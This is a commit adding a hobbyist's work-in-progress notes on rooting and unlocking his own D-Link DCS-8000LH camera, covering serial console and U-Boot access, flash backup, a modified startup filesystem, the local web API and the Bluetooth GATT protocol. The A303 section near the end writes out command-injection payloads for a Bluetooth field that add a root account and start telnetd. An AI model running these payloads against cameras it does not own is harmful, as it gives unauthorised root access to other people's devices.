WiP: docs

Signed-off-by: Bjørn Mork <bjorn@mork.no>

1 files changed, 1300 insertions, 0 deletions

diff --git a/dcs8000lh.md b/dcs8000lh.md
new file mode 100644
index 0000000..942ba63
--- /dev/null
+++ b/dcs8000lh.md
@@ -0,0 +1,1300 @@
+# D-Link DCS-8000LH
+
+## Hardware spec
+
+ *
+ *
+
+No ethernet.  No USB.  No memory card slot.
+
+Currently unsupported by OpenWrt.
+
+
+## Foggy business
+
+Bummer.  Got a new camera with firmware version 2.01.03.  This version
+is locked to a app/cloud service.  It does not run a local NIPCA
+compatible web API, and it does not stream video in a fashion we can
+easily access.  And there is no way to downgrade the firmware either.
+In fact, there is no easy way to install any firmware image
+
+
+## Serial console
+
+Despite the above, I gotta love D-Link for this one.
+
+Started opening the case, which is pretty simple: Remove the two
+screws behind the bottom label, remove the top and bottom "lids".
+Split the two cylinder halves.
+
+But I didn't finish opening the case, because I discovered that the
+serial console is accessible from the outside!  There is a 2 mm, 4
+hole, female header in the bottom of the camera. This header is
+accessible via 4 tiny holes in the case behind the bottom
+label. Simply mate it with a 3 (or 4) pin male 2 mm connector, and you
+have console!
+
+The pinout seen from center to edge of camera is:
+
+ | GND | RX | TX |  3.3V |
+
+You obviously need a 3.3V TTL adapter for this.  I use a cheap PL2303
+based USB adapter from eBay.  Look at the generic OpenWrt console
+instructions for guidance.
+
+The serial port parameters are 57600 8N1
+
+
+## U-Boot
+
+The camera came with
+
+`U-Boot 2014.01-rc2-V1.1 (Jun 06 2018 - 03:44:37)`
+
+
+without too much vendor added mess AFIACS.  There is one minor issue
+though: Access to the prompt is password protected.
+
+Still, even if this might provoke some bad thoughts, I just have to
+love D-Link for making the password readily available in their GPL
+package :-)
+
+From `DCS-8000LH-GPL/configs/gpl_defconfig`:
+
+`ALPHA_FEATURES_UBOOT_LOGIN_PASSWORD="alpha168"`
+
+Enter this password when you see
+
+`Press ESC to abort autoboot in 3 seconds`
+
+And you'll get a `rlxboot#` prompt :
+
+```
+rlxboot# ?
+?       - alias for 'help'
+base    - print or set address offset
+bootm   - boot application image from memory
+bootp   - boot image via network using BOOTP/TFTP protocol
+cmp     - memory compare
+coninfo - print console devices and information
+cp      - memory copy
+crc32   - checksum calculation
+echo    - echo args to console
+editenv - edit environment variable
+efuse   - efuse readall | read addr
+env     - environment handling commands
+fephy   - fephy read/write
+go      - start application at address 'addr'
+help    - print command description/usage
+imxtract- extract a part of a multi-image
+loadb   - load binary file over serial line (kermit mode)
+loadx   - load binary file over serial line (xmodem mode)
+loady   - load binary file over serial line (ymodem mode)
+loop    - infinite loop on address range
+md      - memory display
+mm      - memory modify (auto-incrementing address)
+mw      - memory write (fill)
+nm      - memory modify (constant address)
+ping    - send ICMP ECHO_REQUEST to network host
+printenv- print environment variables
+reset   - Perform RESET of the CPU
+setenv  - set environment variables
+setethaddr- set eth address
+setipaddr- set ip address
+sf      - SPI flash sub-system
+source  - run script from memory
+tftpboot- boot image via network using TFTP protocol
+tftpput - TFTP put command, for uploading files to a server
+tftpsrv - act as a TFTP server and boot the first received file
+update  - update image
+version - print monitor, compiler and linker version
+```
+
+Using this for image manipulation is hard since there is no ethernet,
+USB or removable flash.  It is probably possible to load an image over
+serial, but I don't have the patience for that....
+
+The environment is pretty clean too:
+```
+rlxboot# printenv
+=3
+addmisc=setenv bootargs ${bootargs}console=ttyS0,${baudrate}panic=1
+baudrate=57600
+bootaddr=(0xBC000000 + 0x1e0000)
+bootargs=console=ttyS1,57600 root=/dev/mtdblock8 rts_hconf.hconf_mtd_idx=0 mtdparts=m25p80:256k(boot),128k(pib),1024k(userdata),128k(db),128k(log),128k(dbbackup),128k(logbackup),3072k(kernel),11264k(rootfs)
+bootcmd=bootm 0xbc1e0000
+bootfile=/vmlinux.img
+ethact=r8168#0
+ethaddr=00:00:00:00:00:00
+load=tftp 80500000 ${u-boot}
+loadaddr=0x82000000
+stderr=serial
+stdin=serial
+stdout=serial
+
+Environment size: 533/131068 bytes
+```
+
+No need to dwell on the weirdness of ethernet settings here. Modifying
+the command line is more than enough for our purpose:
+
+`rlxboot# setenv bootargs ${bootargs} init=/bin/sh`
+
+Then continue to boot normally:
+
+`rlxboot# ${bootcmd}`
+
+This will provide a temporary root shell, without making any permanent
+changes to the system. But /sbin/init is skipped altogether, which
+means that nothing is mounted etc.  Not even /sys and /proc.  The
+simplest way to both have the root shell and a normal system, is by
+running
+
+`/etc/rc.d/rcS` 
+
+in that root shell.  You might also want to run
+
+`telnetd -l /bin/sh`
+
+so you can telnet into the camera instead of/in addition to the shell
+on the serial console.  Only if you set up networking, using the mydlink
+app, first, of course.
+
+## Configuring the camera using the mydlink app
+
+We need networking for the remaining parts.  Which means that you have
+to configure the camera, either using the mydlink app, or by using
+Bluetooth GATT commands as described below.
+
+
+### Automatic firmware upgrades
+
+Remember to disable automatic firmware upgrades before changing any of
+the installed file systems.
+
+The file systems will be replaced on every firmware upgrade, so any
+local changes will be lost if the camera is upgraded.  Let the system
+upgrade to the latest version before making the changes, if you want
+the most recent firmware.
+
+Note that I've only tested the procedure with firmware versions
+*2.01.03* and *2.02.02*.  A different set of modifications could be
+necessary to make this work with other versions.
+
+
+## Backing up
+
+Create a backup of everything *before* you mess up.  Restoring will be
+hard anyway, so don't rely on that.  But you can forget about
+restoring at all unless you have the backup, so make it anyway.
+
+Note that the "pib" partition contains device specific data which
+cannot be restored from any other source than your device:
+ * model number
+ * hardware revision
+ * mac address
+ * feature bits
+ * private keys and passwords
+
+The backup is also useful for analyzing the system offline.
+
+You will need networking.  In theory, you could dump the flash to the
+console and save it from the terminal, but that would be very time
+consuming and tiresome.
+
+There are several network transfer tools in the original firmware:
+ * tftp
+ * wget
+ * curl
+ * ...and probably more
+
+
+I've been using tftp becuase it is simple. You'll obviously need a
+tftp server for this. Google for instructions on setting that up.  You
+could alternatively set up a web server to use wget or curl.
+
+Copying out all flash partitions is as easy as for example:
+
+`for i in 0 1 2 3 4 5 6 7 8; do tftp -l /dev/mtd${i}ro -r mtd$i -p 192.168.2.1; done`
+
+Change 192.168.2.1 to the address of your tftp server. Some tftp
+servers might require existing and writable destination files. Refer
+to the tftp server docs.
+
+
+FIXME:  check out /usr/bin/flash_erase and /usr/bin/flashcp
+
+
+
+### Partitions
+
+The partitions are:
+```
+# cat /proc/mtd 
+dev:    size   erasesize  name
+mtd0: 00040000 00010000 "boot"
+mtd1: 00020000 00010000 "pib"
+mtd2: 00100000 00010000 "userdata"
+mtd3: 00020000 00010000 "db"
+mtd4: 00020000 00010000 "log"
+mtd5: 00020000 00010000 "dbbackup"
+mtd6: 00020000 00010000 "logbackup"
+mtd7: 00300000 00010000 "kernel"
+mtd8: 00b00000 00010000 "rootfs"
+```
+Or as seen by the driver with start and end addresses:
+
+```
+9 cmdlinepart partitions found on MTD device m25p80
+Creating 9 MTD partitions on "m25p80":
+0x000000000000-0x000000040000 : "boot"
+0x000000040000-0x000000060000 : "pib"
+0x000000060000-0x000000160000 : "userdata"
+0x000000160000-0x000000180000 : "db"
+0x000000180000-0x0000001a0000 : "log"
+0x0000001a0000-0x0000001c0000 : "dbbackup"
+0x0000001c0000-0x0000001e0000 : "logbackup"
+0x0000001e0000-0x0000004e0000 : "kernel"
+0x0000004e0000-0x000000fe0000 : "rootfs"
+```
+
+Partition usage summary:
+
+ | number | name        | start    | end      |   size   | fstype   | contents       |
+ |   0    | "boot"      | 0x000000 | 0x040000 |  0x40000 | boot     | U-Boot         |
+ |   1    | "pib"       | 0x040000 | 0x060000 |  0x20000 | raw      | device info    |
+ |   2    | "userdata"  | 0x060000 | 0x160000 | 0x100000 | squashfs | mydlink (/opt) |
+ |   3    | "db"        | 0x160000 | 0x180000 |  0x20000 | tar.gz   | dynamic data   |
+ |   4    | "log"       | 0x180000 | 0x1a0000 |  0x20000 | raw?     | empty          |
+ |   5    | "dbbackup"  | 0x1a0000 | 0x1c0000 |  0x20000 | tar.gz   | copy of "db"   |
+ |   6    | "logbackup" | 0x1c0000 | 0x1e0000 |  0x20000 | raw?     | empty          |
+ |   7    | "kernel"    | 0x1e0000 | 0x4e0000 | 0x300000 | uImage   | Linux 3.10     |
+ |   8    | "rootfs"    | 0x4e0000 | 0xfe0000 | 0xb00000 | squashfs | rootfs (/)    |
+
+
+Firmware upgrades replace the "userdata", "kernel" and "rootfs"
+partitions, but leave all(?) other partitions unmodified. I imagine
+that the "boot" partition could be upgraded too if necessary. But it
+was not touched when going from 2.01.03 to 2.02.02, FWIW.
+
+The "log" and "logbackup" appear to be currently unused.  But I am
+reluctant trusting this, given their names.  I guess they could be
+cleaned and overwritten anytime.
+
+
+### Backup up dynamic data
+
+This is not necessary for system operation as any non-volatile data is
+saved in the "db" partition anyway.  But it can still be useful
+to have a copy of the system state for offline studying, so I also
+like to save a working copy of /tmp:
+```
+tar zcvf /tmp/tmp.tgz /tmp/
+tftp -l /tmp/tmp.tgz -r tmp.tgz -p 192.168.2.1
+```
+
+
+## Making the NIPCA webserver start automatically
+
+The good news is that D-Link left all the webserver parts in the
+firmware, including all the NIPCA CGI tools. You can start it from the
+shell by running:
+```
+tdb set HTTPServer Enable_byte=1
+/etc/rc.d/init.d/extra_lighttpd.sh start
+```
+Changing the `HTTPServer Enable_byte` is only necessary the first
+time.  The setting is stored in the non-volatile "db" partition.
+
+The bad news is that I haven't found a way to re-enable the webserver
+startup by simply making changes to the non-volatile variables. Making
+the webserver start automatically requires changes to a file system in
+either the "userdata" or "rootfs" partition.  I have chosen to modify
+the "userdata" file system because it only contains the mydlink
+applications mounted on /opt, and messing with it is therefore much
+simpler than messing with the root filesystem.
+
+
+### Creating a modified "userdata" file system
+
+This is done on a separate Linux system, using the backup we made of
+mtd2 ("userdata"). The necessary tools are unsquashfs and mksquashfs,
+found in the squashfs-tools package on Debian.
+
+```
+cd /tmp
+unsquashfs mtd2
+vi squashfs-root/webenable
+chmod 755 squashfs-root/webenable
+sed -i -e '/check_alive strmsvr/i \
+  check_alive webenable' squashfs-root/mydlink_watchdog.sh
+mksquashfs squashfs-root mtd2.new -all-root -comp xz
+```
+
+You can put whatever you want into the webenable script. But make sure
+it works, and doesn't exit, since the mydlink_watchdog we use to start
+it might barf otherwise.
+
+webenable script example, creating a new root user named "foo" and
+starting telnetd as well:
+```
+#!/bin/sh
+
+echo "Doing local fixups..."
+killall -TERM telnetd
+grep -Eq ^foo: /etc/passwd || echo "foo:x:0:0::/:/bin/sh" >> /etc/passwd && echo "foo:$(pibinfo Pincode)" | chpasswd -m
+[ "$(tdb get HTTPServer Enable_byte)" -eq "1" ] || tdb set HTTPServer Enable_byte=1
+[ -n "$(tdb get HTTPAccount AdminPasswd_ss)" ] || tdb get HTTPAccount AdminPasswd_ss=$(pibinfo Pincode)
+/etc/rc.d/init.d/extra_lighttpd.sh start
+telnetd -F
+```
+
+You might want to upload this script to the /tmp ramfs and test it a
+few times before writing it to flash.  When you are satisfied, then do
+something like this in the camera shell:
+```
+tftp -r mtd2.new -l /tmp/mtd2.new -g 192.168.2.1
+umount /opt
+```
+
+The `umount` will likely fail.  If so, then do not continue, but look
+for any processing keeping files in /opt open, kill them, and retry. For example
+
+```
+# ps w|grep /mydlink
+  800 root      1432 S    {mydlink_watchdo} /bin/sh /mydlink/mydlink_watchdog.
+ 1133 root     17936 S    /mydlink/strmsvr
+ 1422 root     18896 S    /mydlink/cda
+ 1455 root      4464 S <  /mydlink/sa
+ 2299 root     26076 S    /mydlink/da_adaptor -s mdb
+19627 root      1416 S    grep /mydlink
+# kill -TERM 800 1133 1422 1455 2299
+umount /opt
+```
+
+After successfully unmounting:
+```
+cat /tmp/mtd2.new >/dev/mtdblock2 
+mount /dev/mtdblock2 /opt
+```
+
+You should now see your script as `/opt/webenable`, and it will start
+automatically after booting.  This change is permanent until the next
+firmware upgrade, after which the process must be repeated from the
+beginning.  So you'll want to disable automatic upgrades unless you
+enjoy using the serial console.
+
+
+
+### Using NIPCA to manage the camera
+
+The local web server provides a direct camera management API, but not
+a web GUI application. And all commands require authentication. By
+default there is a single admin user, using the pincode from the
+camera label as passord.  I believe you can add more users using the
+API, but I haven't tested this.
+
+Google a NIPCA reference, or look at the script names under /var/www
+and try them out.  Some examples:
+
+
+```
+$ curl -u admin:012345 'http://dcs8000lh.mork.no/config/datetime.cgi' 
+method=1
+timeserver=ntp1.dlink.com
+timezone=1
+utcdate=2019-05-09
+utctime=13:25:14
+date=2019-05-09
+time=15:25:14
+dstenable=yes
+dstauto=yes
+offset=01:00
+starttime=3.2.0/02:00:00
+stoptime=11.1.0/02:00:00
+
+$ curl -u admin:012345 http://dcs8000lh.mork.no/config/led.cgi?led=off
+led=off
+```
+
+
+### Streaming video locally
+
+The whole point of all this... We can now stream directly from the
+camera using for example:
+
+```
+vlc https://192.168.2.99/video/mpegts.cgi
+vlc https://192.168.2.99/video/flv.cgi
+```
+
+...of course replacing 192.168.2.99 with the address of your camera.
+Use the same admin user and pincode to authenticate.
+
+
+
+
+## Bluetooth
+
+The mydlink app use Bluetooth LE GATT commands for the initial setup,
+like selecting and configuring a Wireless network. It is possible to
+do this manually too, if you have a Linux system with a modern
+Bluetooth controller.  Most laptops with Linux will do.
+
+The Bluetooth service is in "locked" mode by default, This is
+controlled by the "Ble Mode" setting in the "db". If true ("1"), then
+most of the Bluetooth commands are rejected.  The system will
+automatically enter lock mode 180 seconds after the last client
+disconnected.
+
+There are multiple ways to unlock the Bluetooth service, like for
+example running `tdb set Ble Mode_byte=0` in a shell.  But the
+obviously most useful unlock method is using the challenge -> response
+method described below
+
+
+### Convert pincode to session key
+
+Most of the Bluetooth commands are protected when locked.  They can be
+unlocked by using the pincode printed on the camera label.  This
+pincode is not sent directly over the air though. Instead it is
+combined with a random challenge.
+
+Both the random challenge and the matching key are generated by the
+application `sbin/gen_bt_config` on the camera side.  The key is
+calculated by taking the first 16 bytes of the base64 encoded md5sum
+of the concatination of
+ * model string
+ * '-'
+ * four last uppercase digits of the mac address
+ * pincode
+ * challenge.
+
+The first part., before the pincode, happens to be identical to the
+Bluetooth device name.  So an application can simply use this.
+
+Note that this application depend on bluetooth libraries, which are
+not in /lib. So we have to set LD\_LIBRARY\_PATH to run it:
+
+```
+# LD_LIBRARY_PATH=/var/bluetooth/lib sbin/gen_bt_config update_key_only
+In main:182: modelStr = 'DCS-8000LH'
+In main:183: mac = 'b0:c5:54:ab:cd:ef'
+In update_ble_key:87: key data = 'DCS-8000LH-CDEF012345b2gaescrbldchnik'
+```
+
+I've slightly obfuscated my data here - the pincode in the above case
+is `012345`, and the dynamically generated challenge is
+`b2gaescrbldchnik`. The generated challenge and key are stored in
+`/tmp/db/db.xml` and can be read directly from there:
+```
+# grep Key /tmp/db/db.xml |tail -2
+<ChallengeKey type="3" content="b2gaescrbldchnik" />
+<Key type="5" content="jrtY6nONQ5rV+2Ph" />
+```
+
+Or you can read them using the same tools the Bluetooth system uses:
+```
+# tdb get Ble ChallengeKey_ss
+b2gaescrbldchnik
+# mdb get ble_key
+jrtY6nONQ5rV+2Ph
+```
+
+Yes, it does actually use tdb for the first one and mdb for the
+second.  I have absolutely no idea why,... It is possible to read the key using tdb too:
+
+```
+# tdb get Ble Key_ss
+jrtY6nONQ5rV+2Ph
+```
+
+Generating the key by hand on a Linux system, without the final
+truncation to 16 bytes:
+
+```
+$ echo -n 'DCS-8000LH-CDEF012345b2gaescrbldchnik' | md5sum | xxd -r -p | base64 | cut -c-16
+jrtY6nONQ5rV+2Ph
+```
+
+### GATT API
+
+D-Link is using the GATT BlueZ example plugin, patching it to add
+their camera specific endpoints.  This means that we can find all the
+API "documentation" in the
+`DCS-8000LH-GPL/package/bluez_utils/feature-patch/5.28/customized-mydlink.patch`
+file in the GPL archive.
+
+They use a number of 16bit UUIDs with nonsense names:
+```
++#define IPCAM_UUID		0xD001
++#define A000_UUID		0xA000
++#define A001_UUID		0xA001
++#define A100_UUID		0xA100
++#define A101_UUID		0xA101
++#define A102_UUID		0xA102
++#define A103_UUID		0xA103
++#define A104_UUID		0xA104
++#define A200_UUID		0xA200
++#define A201_UUID		0xA201
++#define A300_UUID		0xA300
++#define A301_UUID		0xA301
++#define A302_UUID		0xA302
++#define A303_UUID		0xA303
++#define A304_UUID		0xA304
+```
+
+
+`IPCAM_UUID` is registered as the `GATT_PRIM_SVC_UUID`, which means
+that it shows up as a primary GATT service we can scan for.
+
+The rest of the UUIDs are characteristics of the primary service.
+
+
+#### data formatting
+
+Both input and output parameters are sent as ascii strings with
+key=value pairs joined by `;`.  The keys are single upper case
+characters. Key names are reused, so the meaning depend on the
+endpoint. 
+
+Values are either integers, including boolean 0/1, or a consist of a
+restricted set of ascii text.
+
+Examples:
+```
+M=1;C=b2gaescrbldchnik
+N=DCS-8000LH;P=1;T=1557349762;Z=CET-1CEST,M3.5.0,M10.5.0/3;F=2.01.03;H=A1;M=B0C554ABCDEF;V=3.0.0-b71
+I=192.168.2.37;N=255.255.255.0;G=192.168.2.1;D=148.122.16.253
+```
+
+#### Endpoints
+
+FIXME: /sbin/save_wireless_info decodes S and E values into wpa_supplicant.conf settings. How?
+
+FIXME: figure out the wlan survey format.  It splits pages, and numbers them.
+
+L=I=AirLink126FD4,M=0,C=11,S=4,E=2,P=46&L=I=Antiboks,M=0,C=1,S=4,E=2,P=88&L=I=ASV17,M=0,C=11,S=4,E=2,P=48&L=I=ASV17-dlink,M=0,C=6,S=4,E=2,P=72&L=I=fjorde123,M=0,C=1,S=4,E=2,P=48&L=I=Getbox-2B797A,M=0,C=1,S=4,E=2,P=46&L=I=JOJ,M=0,C=11,S=4,E=2,P=56&L=I=Kjellerbod,M=0,C=1,S=4,E=2,P=75&L=I=mgmt,M=0,C=1,S=4,E=2,P=88&L=I=Rindedal,M=0,C=11,S=4,E=2,P=64&L=I=VIF,M=0,C=11,S=4,E=2,P=46
+
+Real example:
+
+[B0:C5:54:4C:CC:73][LE]> characteristics 0x0011
+handle: 0x0012, char properties: 0x12, char value handle: 0x0013, uuid: 0000a000-0000-1000-8000-00805f9b34fb
+handle: 0x0015, char properties: 0x0a, char value handle: 0x0016, uuid: 0000a001-0000-1000-8000-00805f9b34fb
+handle: 0x0017, char properties: 0x02, char value handle: 0x0018, uuid: 0000a100-0000-1000-8000-00805f9b34fb
+handle: 0x0019, char properties: 0x0a, char value handle: 0x001a, uuid: 0000a101-0000-1000-8000-00805f9b34fb
+handle: 0x001b, char properties: 0x08, char value handle: 0x001c, uuid: 0000a102-0000-1000-8000-00805f9b34fb
+handle: 0x001d, char properties: 0x02, char value handle: 0x001e, uuid: 0000a103-0000-1000-8000-00805f9b34fb
+handle: 0x001f, char properties: 0x02, char value handle: 0x0020, uuid: 0000a104-0000-1000-8000-00805f9b34fb
+handle: 0x0021, char properties: 0x0a, char value handle: 0x0022, uuid: 0000a200-0000-1000-8000-00805f9b34fb
+handle: 0x0023, char properties: 0x08, char value handle: 0x0024, uuid: 0000a201-0000-1000-8000-00805f9b34fb
+handle: 0x0025, char properties: 0x0a, char value handle: 0x0026, uuid: 0000a300-0000-1000-8000-00805f9b34fb
+handle: 0x0027, char properties: 0x02, char value handle: 0x0028, uuid: 0000a301-0000-1000-8000-00805f9b34fb
+handle: 0x0029, char properties: 0x08, char value handle: 0x002a, uuid: 0000a302-0000-1000-8000-00805f9b34fb
+handle: 0x002b, char properties: 0x08, char value handle: 0x002c, uuid: 0000a303-0000-1000-8000-00805f9b34fb
+handle: 0x002d, char properties: 0x02, char value handle: 0x002e, uuid: 0000a304-0000-1000-8000-00805f9b34fb
+
+
+
+FIXME: what are the provisioning parameters?
+
+example:
+
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0028
+Characteristic value/descriptor: 4e 3d 3b 54 3d 3b 55 3d 
+
+bjorn@miraculix:/usr/local/src/git/DCS-8000LH-GPL$ decode-ascii.pl 4e 3d 3b 54 3d 3b 55 3d
+N=;T=;U=
+
+
+FIXME: the mydlink register commands operate on /tmp/mydlink/reg_st and /tmp/mydlink/reg_info files
+
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x002e
+Characteristic value/descriptor: 53 3d 31 31 3b 45 3d 30 
+bjorn@miraculix:/usr/local/src/git/DCS-8000LH-GPL$ decode-ascii.pl 53 3d 31 31 3b 45 3d 30
+S=11;E=0
+
+after factory reset:
+
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x002e
+Characteristic value/descriptor: 45 3d 30 3b 53 3d 30 
+
+bjorn@miraculix:/usr/local/src/git/DCS-8000LH-GPL$ decode-ascii.pl 45 3d 30 3b 53 3d 30
+E=0;S=0
+
+
+
+The characteristics are mapped to system commands or data as follows::
+
+ | UUID | op     | description     | format                                  | keys                                                                                                            |
+ | A000 | read   | last status     | C=%d;A=%d;R=%d                          | C: uuid, A: mode, R: state                                                                                      |
+ | A000 | notify | last status     | C=%d;A=%d;R=%d                          | C: uuid, A: mode, R: state                                                                                      |
+ | A001 | read   | challenge       | M=%d;C=%s                               | M: opmode, C: challenge                                                                                         |
+ | A001 | write  | auth            | M=%d;K=%s                               | M: opmode, K: key                                                                                               |
+ | A100 | read   | wifi survey     | N=%d;P=%d;...                           |                                                                                                                 |
+ | A101 | read   | wifi config     | M=%s;I=%s;S=%s;E=%s                     | M: opmode, I: essid, S: 4 , E: 2                                                                                |
+ | A101 | write  | wifi config     | M=%s;I=%s;S=%s;E=%s;K=%s                | M: opmode, I: essid, S: 4 , E: 2, K: password                                                                   |
+ | A102 | write  | wifi connect    | C=%d                                    | C: connect (0/1)                                                                                                |
+ | A103 | read   | wifi status     | S=%d                                    | S: wifi link status (0,1,?)                                                                                     |
+ | A104 | read   | ip config       | I=%s;N=%s;G=%s;D=%s                     | I: address, N: netmask, G: gateway, D: DNS-server                                                               |
+ | A200 | read   | system info     | N=%s;P=%d;T=%d;Z=%s;F=%s;H=%s;M=%s;V=%s | N: devicename, P: haspin (0/1), T: time (unix epoch), Z: timezone, F: fwver, H: hwver, M: macaddr, V:mydlinkver |
+ | A200 | write  | name and time   | N=%s;T=%d;Z=%s                          | N: devicename, T: time (unix epoch), Z: timezone                                                                |
+ | A201 | write  | admin password  | P=%s;N=%s                               | P: current password (pincode), N: new password                                                                  |
+ | A300 | read   | reg state       | G=%d                                    | G: registration state (0/1)                                                                                     |
+ | A300 | write  | reg state       | G=%d                                    | G: registration state (0/1)                                                                                     |
+ | A301 | read   | provisioning    | N=%s;T=%s;U=%s                          | N: username, T: footprint, U: portal                                                                            |
+ | A302 | write  | restart mydlink | C=%d                                    | C: restart (0/1)                                                                                                |
+ | A303 | write  | register        | S=%s;M=%s                               | S: , M:  (written to /tmp/mydlink/reg_info, and then kill -USR1 `pidof da_adaptor`)                             |
+ | A304 | read   | register        | S=%d;E=%d                               | S: , E:  (cat /tmp/mydlink/reg_st)                                                                              |
+
+
+
+##### A100
+
+The wifi survey scan results are split in 128 byte "pages", where each
+page starts with the total number of pages and the current page
+number.  The characteristic value must be read as many times as the
+given total to restrieve all pages.
+
+For example, reading 3 pages:
+```
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0018
+Characteristic value/descriptor: 4e 3d 33 3b 50 3d 31 3b 4c 3d 49 3d 41 6e 74 69 62 6f 6b 73 2c 4d 3d 30 2c 43 3d 36 2c 53 3d 34 2c 45 3d 32 2c 50 3d 36 32 26 4c 3d 49 3d 41 53 56 31 37 2c 4d 3d 30 2c 43 3d 31 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 34 36 26 4c 3d 49 3d 41 53 56 31 37 2d 64 6c 69 6e 6b 2c 4d 3d 30 2c 43 3d 36 2c 53 3d 34 2c 45 3d 32 2c 50 3d 36 38 26 4c 3d 49 3d 66 6a 6f 72 64 65 31 32 33 2c 4d 3d 30 
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0018
+Characteristic value/descriptor: 4e 3d 33 3b 50 3d 32 3b 2c 43 3d 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 35 38 26 4c 3d 49 3d 4a 4f 4a 2c 4d 3d 30 2c 43 3d 31 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 34 37 26 4c 3d 49 3d 4b 6a 65 6c 6c 65 72 62 6f 64 2c 4d 3d 30 2c 43 3d 36 2c 53 3d 34 2c 45 3d 32 2c 50 3d 36 32 26 4c 3d 49 3d 6d 67 6d 74 2c 4d 3d 30 2c 43 3d 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 37 34 26 4c 3d 49 3d 52 69 
+[B0:C5:54:4C:CC:73][LE]> char-read-hnd 0x0018
+Characteristic value/descriptor: 4e 3d 33 3b 50 3d 33 3b 6e 64 65 64 61 6c 2c 4d 3d 30 2c 43 3d 31 31 2c 53 3d 34 2c 45 3d 32 2c 50 3d 36 32 
+```
+
+The strings are decoded to:
+```
+N=3;P=1;L=I=Antiboks,M=0,C=6,S=4,E=2,P=62&L=I=ASV17,M=0,C=11,S=4,E=2,P=46&L=I=ASV17-dlink,M=0,C=6,S=4,E=2,P=68&L=I=fjorde123,M=0
+N=3;P=2;,C=1,S=4,E=2,P=58&L=I=JOJ,M=0,C=11,S=4,E=2,P=47&L=I=Kjellerbod,M=0,C=6,S=4,E=2,P=62&L=I=mgmt,M=0,C=1,S=4,E=2,P=74&L=I=Ri
+N=3;P=3;ndedal,M=0,C=11,S=4,E=2,P=62
+```
+
+Which, when joined after removing the paging info, becomes::
+```
+L=I=Antiboks,M=0,C=6,S=4,E=2,P=62&L=I=ASV17,M=0,C=11,S=4,E=2,P=46&L=I=ASV17-dlink,M=0,C=6,S=4,E=2,P=68&L=I=fjorde123,M=0,C=1,S=4,E=2,P=58&L=I=JOJ,M=0,C=11,S=4,E=2,P=47&L=I=Kjellerbod,M=0,C=6,S=4,E=2,P=62&L=I=mgmt,M=0,C=1,S=4,E=2,P=74&L=I=Rindedal,M=0,C=11,S=4,E=2,P=62
+```
+
+After splitting the list on &, the final result is:
+```
+L=I=Antiboks,M=0,C=6,S=4,E=2,P=62
+L=I=ASV17,M=0,C=11,S=4,E=2,P=46
+L=I=ASV17-dlink,M=0,C=6,S=4,E=2,P=68
+L=I=fjorde123,M=0,C=1,S=4,E=2,P=58
+L=I=JOJ,M=0,C=11,S=4,E=2,P=47
+L=I=Kjellerbod,M=0,C=6,S=4,E=2,P=62
+L=I=mgmt,M=0,C=1,S=4,E=2,P=74
+L=I=Rindedal,M=0,C=11,S=4,E=2,P=62
+```
+
+So each L entry is made up of the same set of keys:
+
+ * I: essid
+ * M: opmode? or authalg? (always 0 in the sample)
+ * C: channel (2.4 GHz only)
+ * S: key_mgmt/auth_alg/proto?
+ * E: key_mgmt/auth_alg/proto?
+ * P: relative signal. Higher is better. dBm + 100?
+
+Still need to figure out the mapping of the M,S,E keys to
+wpa_supplicant config settings. The setting `M=0;I=Kjellerbod;S=4;E=2`
+is mapped to this configuration:
+```
+# cat /tmp/wpa_supplicant.conf 
+ctrl_interface=/var/run/wpa_supplicant
+device_type=4-0050F204-3
+model_name=DCS-8000LH
+manufacturer=D-Link
+os_version=01020300
+config_methods=push_button virtual_push_button
+eapol_version=1
+network={
+        scan_ssid=1
+        ssid="Kjellerbod"
+        key_mgmt=WPA-PSK
+        auth_alg=OPEN
+        proto=RSN
+        psk="redeacted"
+}
+```
+
+##### A303
+
+The two strings S and M are url decoded, checked for special characters, and then fed into
+```
+	snprintf(cmdbuf, sizeof(cmdbuf), "echo \"S=%s;M=%s\" > /tmp/mydlink/reg_info", S_str, M_str);
+	generic_run_cmd(cmdbuf);
+	generic_run_cmd("kill -USR1 `pidof da_adaptor`");
+```
+It is pretty safe to assume that this provides some registration info
+to the mydlink system, allowing it to connect to the cloud service.
+
+The set of allowed characters is rather interesting:
+```
+ "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
+```
+
+
+This should open up a hole or two....
+
+for example: set S to
+`S=">/dev/null; echo -e "#!/bin/sh\ntouch /tmp/foo" >/tmp/kwh2; chmod 755 /tmp/kwh2; /tmp/kwh2; echo "S=x`
+
+
+Try this:
+
+ 1. add an admin:pincode account to /tmp/passwd
+ 2. start telnetd
+ 3. add an admin:pincode account to the web htdigest file
+ 4. start web server
+
+urlencode S in this:
+```
+S=">/dev/null;echo "admin:x:0:0::/:/bin/sh">>/tmp/passwd&&echo admin:pincode|chpasswd;telnetd -p 1057;echo "S=;M=
+
+S=">/dev/null;echo "admin:x:0:0::/:/bin/sh">>/tmp/passwd&&echo admin:pincode|chpasswd;telnetd -p 1057;echo "S=;M=
+
+S=">/dev/null;echo "admin:x:0:0::/:/bin/sh">>/tmp/passwd;echo "S=;M=
+S=">/dev/null;echo admin:pincode|chpasswd;telnetd -p 1057;echo "S=;M=
+
+
+S=">/dev/null;echo "admin:x:0:0::/:/bin/sh">>/tmp/passwd&&echo admin:pincode|chpasswd;telnetd -p 1057;echo "S=;M=
+
+```
+
+#### Notifications
+
+The camera sends `last_action` notifications as an alternative to readding lots of A000 requests:
+
+	"C=%d;A=%d;R=%d", last_action_status.uuid, last_action_status.mode, last_action_status.state
+
+
+
+
+
+#### Sample Bluetooth network configuration
+
+ 1. find camera: LE scan (should be limited to devices announcing 0000d001-0000-1000-8000-00805f9b34fb?)
+ 2. connect to device (input: selection): LE connect
+ 3. find the announced services: GATT primary
+ 4. get attributes for our service: GATT characteristics for UUID 0000d001-0000-1000-8000-00805f9b34fb
+ 5. read challenge: GATT read UUID 0000a001-0000-1000-8000-00805f9b34fb => M=1;C=b2gaescrbldchnik
